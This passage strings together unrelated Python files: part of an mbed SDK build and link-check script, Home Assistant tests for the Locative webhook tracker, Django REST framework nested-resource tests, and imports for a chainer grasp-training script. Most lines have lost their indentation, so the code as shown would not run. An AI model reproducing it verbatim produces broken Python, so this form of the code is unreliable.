{ "target": "NUCLEO_F031K6", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F042K6", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F070RB", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F072RB", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F091RC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F103RB", "toolchains": "GCC_ARM", "libs": ["rtos", "fat"] },
{ "target": "NUCLEO_F207ZG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F302R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303K8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F303ZE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "NUCLEO_F334R8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F401RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F410RB", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F412ZG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NUCLEO_L432KC", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_L476RG", "toolchains": "GCC_ARM", "libs": ["dsp", "fat", "rtos", "usb_host"] },
{ "target": "NUCLEO_L011K4", "toolchains": "GCC_ARM", "libs": ["dsp"] },
{ "target": "NUCLEO_L031K6", "toolchains": "GCC_ARM", "libs": ["dsp"] },
{ "target": "NUCLEO_L073RZ", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F429ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F446RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NUCLEO_F446ZE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUCLEO_F746ZG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host" ] },
{ "target": "NUCLEO_F767ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "MOTE_L152RC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "ELMO_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "MTS_MDOT_F405RG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_MDOT_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MTS_DRAGONFLY_F411RE", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "ARCH_MAX", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F051R8", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F303VC", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F334C8", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F401VC", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F407VG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "DISCO_F429ZI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat", "usb_host"] },
{ "target": "DISCO_F469NI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DISCO_F746NG", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_F769NI", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC1114", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_401", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "UBLOX_C027", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U35_501", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "LPC11U68", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC11U37H_401", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "KL05Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "KL25Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL27Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL43Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "KL46Z", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "K20D50M", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "TEENSY3_1", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "K64F", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "K22F", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "LPC4088", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "ARCH_PRO", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "LPC1549", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NRF51822", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "DELTA_DFCM_NNN40", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "NRF51_DK", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "NRF51_MICROBIT", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "fat"] },
{ "target": "EFM32ZG_STK3200", "toolchains": "GCC_ARM", "libs": ["dsp"] },
{ "target": "EFM32HG_STK3400", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32LG_STK3600", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32GG_STK3700", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32WG_STK3800", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb"] },
{ "target": "EFM32PG_STK3401", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos"] },
{ "target": "MAXWSNENV", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "MAX32600MBED", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "MAX32620HSP", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "RZ_A1H", "toolchains": "GCC_ARM", "libs": ["fat"] },
{ "target": "SAMR21G18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "SAMD21J18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "SAMD21G18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "SAML21J18A", "toolchains": "GCC_ARM", "libs": ["dsp", "fat"] },
{ "target": "DISCO_L476VG", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat", "usb_host"] },
{ "target": "NUMAKER_PFM_NUC472", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
{ "target": "NUMAKER_PFM_M453", "toolchains": "GCC_ARM", "libs": ["dsp", "rtos", "usb", "fat"] },
)
################################################################################
# Configure example test building (linking against external mbed SDK libraries like fat or rtos)
linking_list = [
{"target": "LPC1768",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_15", "MBED_16", "MBED_17"],
"eth" : ["NET_1", "NET_2", "NET_3", "NET_4"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "K64F",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "K22F",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "KL43Z",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "NUCLEO_F446ZE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F401RE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F411RE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F412ZG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
}
},
{"target": "NUCLEO_F429ZI",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F207ZG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F746ZG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_F767ZI",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUCLEO_L476RG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : [ "USB_10", "USB_11"],
}
},
{"target": "DISCO_F429ZI",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : [ "USB_10", "USB_11"],
}
},
{"target": "DISCO_F407VG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "NUCLEO_F303ZE",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "DISCO_L476VG",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3", "USB_10", "USB_11"],
}
},
{"target": "NUMAKER_PFM_NUC472",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
},
{"target": "NUMAKER_PFM_M453",
"toolchains": "GCC_ARM",
"tests": {"" : ["MBED_2", "MBED_10", "MBED_11", "MBED_16"],
"fat" : ["MBED_A12", "MBED_19", "PERF_1", "PERF_2", "PERF_3"],
"rtos" : ["RTOS_1", "RTOS_2", "RTOS_3"],
"usb" : ["USB_1", "USB_2" ,"USB_3"],
}
}
]
################################################################################
# Driver
def run_builds(dry_run):
for build in build_list:
toolchain_list = build["toolchains"]
        if not isinstance(toolchain_list, list):
            toolchain_list = [toolchain_list]
for toolchain in toolchain_list:
cmdline = "python tools/build.py -m %s -t %s -j 4 -c --silent "% (build["target"], toolchain)
libs = build.get("libs", [])
if libs:
cmdline = cmdline + " ".join(["--" + l for l in libs])
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
def run_test_linking(dry_run):
""" Function run make.py commands to build and link simple mbed SDK
tests against few libraries to make sure there are no simple linking errors.
"""
for link in linking_list:
toolchain_list = link["toolchains"]
        if not isinstance(toolchain_list, list):
            toolchain_list = [toolchain_list]
for toolchain in toolchain_list:
tests = link["tests"]
# Call make.py for each test group for particular library
for test_lib in tests:
test_names = tests[test_lib]
test_lib_switch = "--" + test_lib if test_lib else ""
cmdline = "python tools/make.py -m %s -t %s -c --silent %s -n %s " % (link["target"], toolchain, test_lib_switch, ",".join(test_names))
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
def run_test_testsuite(dry_run):
cmdline = "python tools/singletest.py --version"
print "Executing: " + cmdline
if not dry_run:
if os.system(cmdline) != 0:
sys.exit(1)
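# Passing "-s" on the command line makes every stage a dry run: the build
# commands are printed but not executed.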
if __name__ == "__main__":
run_builds("-s" in sys.argv)
run_test_linking("-s" in sys.argv)
run_test_testsuite("-s" in sys.argv)
|
|
"""The tests the for Locative device tracker platform."""
from unittest.mock import patch, Mock
import pytest
from homeassistant import data_entry_flow
from homeassistant.components import locative
from homeassistant.components.device_tracker import \
DOMAIN as DEVICE_TRACKER_DOMAIN
from homeassistant.components.locative import DOMAIN, TRACKER_UPDATE
from homeassistant.const import HTTP_OK, HTTP_UNPROCESSABLE_ENTITY
from homeassistant.helpers.dispatcher import DATA_DISPATCHER
from homeassistant.setup import async_setup_component
# pylint: disable=redefined-outer-name
@pytest.fixture(autouse=True)
def mock_dev_track(mock_device_tracker_conf):
"""Mock device tracker config loading."""
pass
@pytest.fixture
def locative_client(loop, hass, hass_client):
"""Locative mock client."""
assert loop.run_until_complete(async_setup_component(
hass, DOMAIN, {
DOMAIN: {}
}))
with patch('homeassistant.components.device_tracker.update_config'):
yield loop.run_until_complete(hass_client())
@pytest.fixture
async def webhook_id(hass, locative_client):
"""Initialize the Geofency component and get the webhook_id."""
hass.config.api = Mock(base_url='http://example.com')
result = await hass.config_entries.flow.async_init('locative', context={
'source': 'user'
})
assert result['type'] == data_entry_flow.RESULT_TYPE_FORM, result
result = await hass.config_entries.flow.async_configure(
result['flow_id'], {})
assert result['type'] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
return result['result'].data['webhook_id']
async def test_missing_data(locative_client, webhook_id):
"""Test missing data."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 1.0,
'longitude': 1.1,
'device': '123',
'id': 'Home',
'trigger': 'enter'
}
# No data
req = await locative_client.post(url)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No latitude
copy = data.copy()
del copy['latitude']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No device
copy = data.copy()
del copy['device']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No location
copy = data.copy()
del copy['id']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# No trigger
copy = data.copy()
del copy['trigger']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
# Test message
copy = data.copy()
copy['trigger'] = 'test'
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Test message, no location
copy = data.copy()
copy['trigger'] = 'test'
del copy['id']
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_OK
# Unknown trigger
copy = data.copy()
copy['trigger'] = 'foobar'
req = await locative_client.post(url, data=copy)
assert req.status == HTTP_UNPROCESSABLE_ENTITY
async def test_enter_and_exit(hass, locative_client, webhook_id):
"""Test when there is a known zone."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': '123',
'id': 'Home',
'trigger': 'enter'
}
# Enter the Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'home'
data['id'] = 'HOME'
data['trigger'] = 'exit'
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'not_home'
data['id'] = 'hOmE'
data['trigger'] = 'enter'
# Enter Home again
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'home'
data['trigger'] = 'exit'
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'not_home'
data['id'] = 'work'
data['trigger'] = 'enter'
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state_name = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device'])).state
assert state_name == 'work'
async def test_exit_after_enter(hass, locative_client, webhook_id):
"""Test when an exit message comes after an enter message."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': '123',
'id': 'Home',
'trigger': 'enter'
}
# Enter Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'home'
data['id'] = 'Work'
# Enter Work
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'work'
data['id'] = 'Home'
data['trigger'] = 'exit'
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'work'
async def test_exit_first(hass, locative_client, webhook_id):
"""Test when an exit message is sent first on a new device."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': 'new_device',
'id': 'Home',
'trigger': 'exit'
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'not_home'
@pytest.mark.xfail(
reason='The device_tracker component does not support unloading yet.'
)
async def test_load_unload_entry(hass, locative_client, webhook_id):
"""Test that the appropriate dispatch signals are added and removed."""
url = '/api/webhook/{}'.format(webhook_id)
data = {
'latitude': 40.7855,
'longitude': -111.7367,
'device': 'new_device',
'id': 'Home',
'trigger': 'exit'
}
# Exit Home
req = await locative_client.post(url, data=data)
await hass.async_block_till_done()
assert req.status == HTTP_OK
state = hass.states.get('{}.{}'.format(DEVICE_TRACKER_DOMAIN,
data['device']))
assert state.state == 'not_home'
assert len(hass.data[DATA_DISPATCHER][TRACKER_UPDATE]) == 1
entry = hass.config_entries.async_entries(DOMAIN)[0]
await locative.async_unload_entry(hass, entry)
await hass.async_block_till_done()
assert not hass.data[DATA_DISPATCHER][TRACKER_UPDATE]
|
|
from django.test import TestCase
from django.db.models.manager import Manager
from django.core.exceptions import ImproperlyConfigured
from rest_framework import serializers
from drf_nested_resource.utils import (
find_child_to_parent_accessor_name,
find_child_to_parent_serializer_field,
compute_default_url_kwarg_for_parent,
find_parent_to_child_manager,
)
from tests.models import (
TargetModel,
ForeignKeySourceModel,
ForeignKeySourceNoRelatedNameModel,
GenericForeignKeySourceModel,
ManyToManyTargetModel,
ManyToManySourceModel,
ManyToManySourceNoRelatedNameModel,
SelfReferencingManyToManyModel,
ManyToManyTowardsSelfReference,
)
class FindRelationshipFieldTest(TestCase):
def test_raises_integrity_error_when_no_relationship_found(self):
with self.assertRaises(ImproperlyConfigured):
find_child_to_parent_accessor_name(
parent_model=ForeignKeySourceModel,
child_model=TargetModel,
)
def test_on_foreign_key_relationship(self):
"""
Test finding the field that represents the parent/child relationship in
a normal `ForeignKey` backed relationship.
"""
attname = find_child_to_parent_accessor_name(
parent_model=TargetModel,
child_model=ForeignKeySourceModel,
)
self.assertEqual(attname, 'target')
def test_on_generic_foreign_key_relationship(self):
"""
Test finding the field that represents the parent/child relationship in
a `GenericForeignKey` backed relationship.
"""
attname = find_child_to_parent_accessor_name(
parent_model=TargetModel,
child_model=GenericForeignKeySourceModel,
)
self.assertEqual(attname, 'object')
def test_on_many_to_many_relationship(self):
"""
Test finding the field that represents the parent/child relationship in
a `ManyToManyField` backed relationship when the child model is the one
which has the `ManyToManyField` declared on it.
"""
attname = find_child_to_parent_accessor_name(
parent_model=ManyToManyTargetModel,
child_model=ManyToManySourceModel,
)
self.assertEqual(attname, 'targets')
def test_on_many_to_many_relationship_from_other_side(self):
"""
Test finding the field that represents the parent/child relationship in
a `ManyToManyField` backed relationship when the parent model is the one
which has the `ManyToManyField` declared on it.
"""
attname = find_child_to_parent_accessor_name(
parent_model=ManyToManySourceModel,
child_model=ManyToManyTargetModel,
)
self.assertEqual(attname, 'sources')
#
# Test Serializers for testing `find_child_to_parent_serializer_field`
#
class NoSuffixSerializer(serializers.ModelSerializer):
class Meta:
model = ForeignKeySourceModel
fields = ('id', 'target')
class WithSuffixSerializer(serializers.ModelSerializer):
target_id = serializers.Field()
class Meta:
model = ForeignKeySourceModel
fields = ('id', 'target_id')
class BaseInheritedSerializer(serializers.ModelSerializer):
target = serializers.PrimaryKeyRelatedField()
class Meta:
model = ForeignKeySourceModel
fields = ('id', 'target')
class InheritedSerializer(BaseInheritedSerializer):
pass
class FindSerializerFieldTest(TestCase):
def test_on_non_suffixed_field_name(self):
"""
Test that the serializer field can be found when it is the same name as
the child to parent accessor attribute name.
"""
field_name = find_child_to_parent_serializer_field(
NoSuffixSerializer,
'target',
)
self.assertEqual(field_name, 'target')
def test_on_suffixed_field_name(self):
"""
Test that the serializer field can be found when the serializer field
has the `_id` suffix as is sometimes the case with `ForeignKey` fields.
"""
field_name = find_child_to_parent_serializer_field(
WithSuffixSerializer,
'target',
)
self.assertEqual(field_name, 'target_id')
def test_on_inherited_serializer(self):
"""
Test that a field declared on a base class of the serializer is still
found. Just in case there is something fishy going on with
`serializer.base_fields`.
"""
field_name = find_child_to_parent_serializer_field(
InheritedSerializer,
'target',
)
self.assertEqual(field_name, 'target')
class ComputeURLKwargForParentTest(TestCase):
"""
    Test that the `compute_default_url_kwarg_for_parent` function comes up
    with sensible defaults for what the url kwarg *should* be when representing
    various relationships for `/parents/<url_kwarg>/children/`.
"""
def test_foreign_key_relationship_kwarg_computation(self):
"""
For the relationship where ChildParent.parent is a ForeignKey field
which points to the ParentModel
"""
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=TargetModel,
child_model=ForeignKeySourceModel,
)
self.assertEqual(url_kwarg, 'target_pk')
def test_generic_foreign_key_relationship_kwarg_computation(self):
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=TargetModel,
child_model=GenericForeignKeySourceModel,
)
self.assertEqual(url_kwarg, 'target_model_pk')
def test_many_to_many_relationship(self):
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=ManyToManyTargetModel,
child_model=ManyToManySourceModel,
)
self.assertEqual(url_kwarg, 'target_pk')
def test_many_to_many_from_other_side_of_relationship(self):
url_kwarg = compute_default_url_kwarg_for_parent(
parent_model=ManyToManySourceModel,
child_model=ManyToManyTargetModel,
)
self.assertEqual(url_kwarg, 'source_pk')
class GetParentToChildManagerTest(TestCase):
"""
Test that the `find_parent_to_child_manager` function is able to find the
manager from the parent object to the child objects for all supported
relationships.
"""
def assertManagersEqual(self, manager_a, manager_b):
"""
        The manager class that django uses for reverse relationships is
        constructed dynamically using code generation, so this is an
        approximate check that the two managers are equivalent.
"""
self.assertIsInstance(manager_a, Manager)
self.assertIsInstance(manager_b, Manager)
self.assertEqual(manager_a.model, manager_b.model)
self.assertEqual(
str(manager_a.all().query),
str(manager_b.all().query),
)
def test_foreign_key_relationship_with_declared_related_name(self):
parent_obj = TargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ForeignKeySourceModel,
)
self.assertManagersEqual(manager, parent_obj.sources)
def test_foreign_key_relationship_without_related_name(self):
parent_obj = TargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ForeignKeySourceNoRelatedNameModel,
)
self.assertManagersEqual(manager, parent_obj.foreignkeysourcenorelatednamemodel_set)
def test_generic_foreign_key_relationship(self):
parent_obj = TargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=GenericForeignKeySourceModel,
)
self.assertManagersEqual(manager, parent_obj.generic_sources)
def test_many_to_many_relationship_with_declared_related_name(self):
parent_obj = ManyToManyTargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManySourceModel,
)
self.assertManagersEqual(manager, parent_obj.sources)
def test_many_to_many_relationship_from_other_side_with_declared_related_name(self):
parent_obj = ManyToManySourceModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManyTargetModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
def test_many_to_many_relationship_without_related_name(self):
parent_obj = ManyToManyTargetModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManySourceNoRelatedNameModel,
)
self.assertManagersEqual(
manager,
parent_obj.manytomanysourcenorelatednamemodel_set,
)
def test_many_to_many_relationship_from_other_side_without_related_name(self):
parent_obj = ManyToManySourceNoRelatedNameModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=ManyToManyTargetModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
def test_many_to_many_relationship_with_self(self):
parent_obj = SelfReferencingManyToManyModel.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=SelfReferencingManyToManyModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
def test_m2m_towards_self_referencing_model(self):
parent_obj = ManyToManyTowardsSelfReference.objects.create()
manager = find_parent_to_child_manager(
parent_obj=parent_obj,
child_model=SelfReferencingManyToManyModel,
)
self.assertManagersEqual(manager, parent_obj.targets)
|
|
#!/usr/bin/env python
from __future__ import division
import argparse
import datetime
import functools
import os.path as osp
import PIL.Image
import random
import socket
import chainer
from chainer import training
from chainer.training import extensions
import chainer_mask_rcnn as cmr
from chainercv import transforms
from chainercv.utils.mask.mask_to_bbox import mask_to_bbox
import fcn
import numpy as np
from grasp_data_generator.datasets import FinetuningOIDualarmGraspDatasetV1
from grasp_data_generator.datasets import FinetuningOIDualarmGraspDatasetV2
from grasp_data_generator.datasets import FinetuningOIDualarmGraspDatasetV3
